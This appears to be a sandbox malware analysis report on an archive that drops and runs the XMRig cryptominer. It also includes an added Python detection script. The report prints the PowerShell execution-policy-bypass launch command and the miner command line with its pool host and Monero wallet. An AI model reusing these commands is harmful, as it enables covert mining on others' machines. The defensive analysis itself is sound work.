Malware Analysis Report

2024-11-16 11:00

Sample ID 240704-dsawba1gqj
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags xmrig execution miner
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-04 03:15

Signatures

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 11.73.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoc2gr2j.bbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win11-20240611-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 20.42.73.27:443 tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2d3ewes.ujh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0cvzhm1.5s3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10-20240611-en

Max time kernel

1796s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rule matches recorded, no description, indicator, process or target captured (all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
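The process tree, pool connection and SeLockMemoryPrivilege adjustment recorded for this detonation are enough to write a detection that needs no byte signature: PowerShell started with -ExecutionPolicy bypass on a script in the user's Temp directory, fetched the XMRig release from GitHub, ran the dropped xmrig.exe with a pool and a Monero payout address on its command line, and that process then opened a TCP session to the same pool host and port. The following is an added example, not sandbox output and not XMRig's own code, that correlates those three event types. Its records are constructed from the Processes, Network and Signatures sections above; the parent PID of powershell.exe, the benign msedge control process and the per-process attribution of the token events are assumptions. The __PSScriptPolicyTest_*.ps1 files listed under Files are written by PowerShell itself at startup to probe script-execution policy, so they are not treated as a dropped payload here.

```python
"""Correlate process, network and token events into a miner verdict.

Added example for this report (not sandbox output, not XMRig code). The
records are constructed from the behavioral26 sections; parent PID 1234,
the msedge control process and the token-event PIDs are assumptions.
"""
import re

# XMRig takes the pool as -o/--url and the payout address as -u/--user,
# in both "-o host:port" and "--url=host:port" forms.
POOL_FLAGS = ("-o", "--url")
USER_FLAGS = ("-u", "--user")
# Standard Monero address: 95 base58 characters, first char 4 (or 8 for a subaddress).
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# Constructed process-creation records modelled on the Processes section.
PROCESS_EVENTS = [
    {"pid": 4696, "ppid": 1234,  # parent PID assumed
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"'},
    {"pid": 4128, "ppid": 4696,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'},
    {"pid": 5000, "ppid": 4900,  # benign control process, constructed
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --lang=en-US'},
]
# Constructed connection records modelled on the Network section (no PID attribution there).
NETWORK_EVENTS = [
    {"dst": "20.26.156.215", "port": 443, "domain": "github.com", "proto": "tcp"},
    {"dst": "185.199.108.133", "port": 443, "domain": "objects.githubusercontent.com", "proto": "tcp"},
    {"dst": "8.8.8.8", "port": 53, "domain": "gulf.moneroocean.stream", "proto": "udp"},
    {"dst": "149.102.143.109", "port": 10128, "domain": "gulf.moneroocean.stream", "proto": "tcp"},
]
# Constructed token-adjust records modelled on the AdjustPrivilegeToken signature.
TOKEN_EVENTS = [
    {"pid": 4696, "privilege": "SeDebugPrivilege"},
    {"pid": 4128, "privilege": "SeLockMemoryPrivilege"},
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def flag_value(tokens, flags):
    """Return the value of the first matching flag ('-o host' or '--url=host'), else None."""
    for i, tok in enumerate(tokens):
        if tok in flags and i + 1 < len(tokens):
            return tokens[i + 1]
        for f in flags:
            if f.startswith("--") and tok.startswith(f + "="):
                return tok[len(f) + 1:]
    return None


def parse_miner_cmdline(cmdline):
    """Extract pool host/port and wallet from an XMRig-style command line, or None."""
    tokens = tokenize(cmdline)
    pool = flag_value(tokens, POOL_FLAGS)
    wallet = flag_value(tokens, USER_FLAGS)
    if pool is None or wallet is None:
        return None
    host, _, port = pool.rpartition(":")
    # Drop an optional scheme such as stratum+tcp:// so hosts compare cleanly.
    host = host.split("://")[-1] if host else pool
    return {"host": host, "port": int(port) if port.isdigit() else None,
            "wallet": wallet, "wallet_is_monero": bool(MONERO_ADDR.match(wallet))}


def analyze(process_events, network_events, token_events):
    """Return (rule, pid, detail) findings across the three event streams."""
    findings = []
    by_pid = {p["pid"]: p for p in process_events}
    miners = {}  # pid -> parsed pool/wallet
    for p in process_events:
        cmd = p["cmdline"]
        if p["image"].lower().endswith("powershell.exe") and re.search(r"-executionpolicy\s+bypass", cmd, re.I):
            m = re.search(r'-file\s+("[^"]+"|\S+)', cmd, re.I)
            script = m.group(1).strip('"') if m else ""
            if USER_TEMP.search(script):
                findings.append(("ps_bypass_temp_script", p["pid"], script))
        parsed = parse_miner_cmdline(cmd)
        if parsed and parsed["wallet_is_monero"]:
            parent = by_pid.get(p["ppid"], {}).get("image", "?")
            detail = f"{parsed['host']}:{parsed['port']} wallet={parsed['wallet'][:8]}... parent={parent}"
            if USER_TEMP.search(p["image"]):
                detail += " (image in user Temp)"
            findings.append(("monero_miner_cmdline", p["pid"], detail))
            miners[p["pid"]] = parsed
    # A TCP session to the exact host:port the miner was told to use is the confirming signal.
    pools = {(m["host"].lower(), m["port"]) for m in miners.values()}
    for n in network_events:
        if n["proto"] == "tcp" and (n["domain"].lower(), n["port"]) in pools:
            findings.append(("pool_connection", None, f"{n['domain']}:{n['port']} -> {n['dst']}"))
    # XMRig asks for SeLockMemoryPrivilege to back RandomX with large pages.
    for t in token_events:
        if t["privilege"] == "SeLockMemoryPrivilege" and t["pid"] in miners:
            findings.append(("lock_memory_priv_by_miner", t["pid"], "large-page request typical of RandomX miners"))
    return findings


def verdict(findings):
    """'miner' when a miner command line and a matching pool session both exist."""
    rules = {r for r, _, _ in findings}
    if {"monero_miner_cmdline", "pool_connection"} <= rules:
        return "miner"
    return "suspicious" if rules else "clean"


if __name__ == "__main__":
    found = analyze(PROCESS_EVENTS, NETWORK_EVENTS, TOKEN_EVENTS)
    for rule, pid, detail in found:
        print(f"{rule:26} pid={pid} {detail}")
    print("verdict:", verdict(found))
```

Matching the pool taken from the child's command line against the outbound connections is what separates a running miner from a merely downloaded binary: the GitHub fetch by PowerShell is ambiguous on its own, while a TCP session to the same host and non-standard port the process was told to use is not. The same parse also yields the payout address, which is a stable indicator across all the detonations in this report even though the script file name and PIDs change.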

Files

memory/4696-0-0x00007FFCA9A13000-0x00007FFCA9A14000-memory.dmp

memory/4696-5-0x000001CDF0D90000-0x000001CDF0DB2000-memory.dmp

memory/4696-8-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-9-0x000001CDF0EC0000-0x000001CDF0F36000-memory.dmp

memory/4696-10-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbywh0hm.c5q.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4696-25-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-29-0x00007FFCA9A13000-0x00007FFCA9A14000-memory.dmp

memory/4696-30-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-38-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4696-51-0x000001CDF0D10000-0x000001CDF0D22000-memory.dmp

memory/4696-64-0x000001CDF0D00000-0x000001CDF0D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4128-93-0x0000029051B60000-0x0000029051B80000-memory.dmp

memory/4696-94-0x00007FFCA9A10000-0x00007FFCAA3FC000-memory.dmp

memory/4128-95-0x00007FF679D20000-0x00007FF67A953000-memory.dmp

memory/4128-96 to memory/4128-157: 62 further dumps of the same region, 0x00007FF679D20000-0x00007FF67A953000

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win11-20240419-en

Max time kernel

1791s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rule matches recorded, no description, indicator, process or target captured (all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/2936-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp

memory/2936-6-0x00000159A9E40000-0x00000159A9E62000-memory.dmp

memory/2936-7-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3ivpgaw.mkj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2936-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2936-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp

memory/2936-14-0x00000159AA240000-0x00000159AA252000-memory.dmp

memory/2936-15-0x00000159AA230000-0x00000159AA23A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
